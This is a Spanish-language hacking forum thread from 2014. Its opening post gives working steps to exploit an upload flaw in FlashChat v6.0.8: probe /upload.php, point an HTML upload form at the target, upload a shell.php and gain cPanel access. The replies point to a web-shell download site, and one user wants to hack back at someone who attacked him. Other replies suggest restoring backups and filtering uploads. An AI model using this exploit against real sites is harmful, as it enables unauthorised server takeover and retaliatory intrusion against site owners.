Sólo texto | Texto con Imágenes

Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Hacking => Mensaje iniciado por: andygrimm en 2 Abril 2014, 06:19 AM

Título: FlashChat v6 0 8 Hack /upload.php
Publicado por: andygrimm en 2 Abril 2014, 06:19 AM
NO SOY EL DESCUBRIDOR DE ESTO, SIMPLEMENTE QUIERO APORTARLO.

1- Bueno para empezar hay que entrar en alguna pagina de FlashChat v6 0 8 y añadirle a la pagina el /upload.php , ejemplo: pagina.com/upload.php, si da una pagina en blanco con algun mensaje en texto, significa que es vulnerable.

2- Ya que tengamos la pagina vulnerable, creamos un archivo de texto con el siguiente codigo:
<form action="http://pagina.com/upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>
Donde dice "action=" ahi ponemos la pagina vulnerable, lo guardamos con la extension .html.

3- Estando en la pagina vulnerable ejecutamos el archivo creado, y de ahi, subimos nuestro shell.php y ya podriamos logear en el cpanel.

Bueno eso fue todo, cualquier duda o consulta ya saben, consulten, suerte!
By andygrimm
Título: Re: FlashChat v6 0 8 Hack /upload.php
Publicado por: Simbita201 en 3 Junio 2014, 17:29 PM
Gracias por el aporte, pero donde encuentro el Shell.php .

Salu2
Título: Re: FlashChat v6 0 8 Hack /upload.php
Publicado por: engel lex en 3 Junio 2014, 19:34 PM
Cita de: Simbita201 en  3 Junio 2014, 17:29 PM
Gracias por el aporte, pero donde encuentro el Shell.php .

Salu2

>.> en serio? eso lo haces tu
Título: Re: FlashChat v6 0 8 Hack /upload.php
Publicado por: Simbita201 en 3 Junio 2014, 20:35 PM
no tengo ni idea, me hachearon el chat y lo intnto recuperar

salu2
Título: Re: FlashChat v6 0 8 Hack /upload.php
Publicado por: engel lex en 4 Junio 2014, 01:13 AM
Metete a tu server, borra todo y monta tu respaldo
Título: Re: FlashChat v6 0 8 Hack /upload.php
Publicado por: Sh4k4 en 4 Junio 2014, 08:38 AM
Citarhttp://www.r57shell.net/
atasquece..
Título: Re: FlashChat v6 0 8 Hack /upload.php
Publicado por: Simbita201 en 4 Junio 2014, 10:40 AM
Cita de: engel lex en  4 Junio 2014, 01:13 AM
Metete a tu server, borra todo y monta tu respaldo

Gracias amigo.
No es la primera vez que me lo hace el mismo individuo, trato de saber recuperarlo, a su estilo, para demostrarle que puedo hacerlo y que me deje en paz.

Salu2
Título: Re: FlashChat v6 0 8 Hack /upload.php
Publicado por: Simbita201 en 4 Junio 2014, 10:42 AM
Cita de: Sh4k4 en  4 Junio 2014, 08:38 AM
atasquece..

Muchas Gracias, lo intentare, solo es cuestión de mostrarle al que me hachea, que tb soy capaz de hacerlo, espero asi se olvide de mi.

Salu2
Título: Re: FlashChat v6 0 8 Hack /upload.php
Publicado por: engel lex en 4 Junio 2014, 13:38 PM
??? o suena a una excusa! XD puedes colocar un filtro en esa parte del sistema ya que sabes por donde sube y listo adíos ataque shell... es uno de los ataque más faciles de bloquear! XD
Título: Re: FlashChat v6 0 8 Hack /upload.php
Publicado por: Simbita201 en 4 Junio 2014, 19:15 PM
Si supiera hacer esas cosas, con el priemer ataque me hubiera bastado, lo habría solucionado.

Gracias

Edito. Gracias Engel, no me ha funcionado, error 404

sañu2
Sólo texto | Texto con Imágenes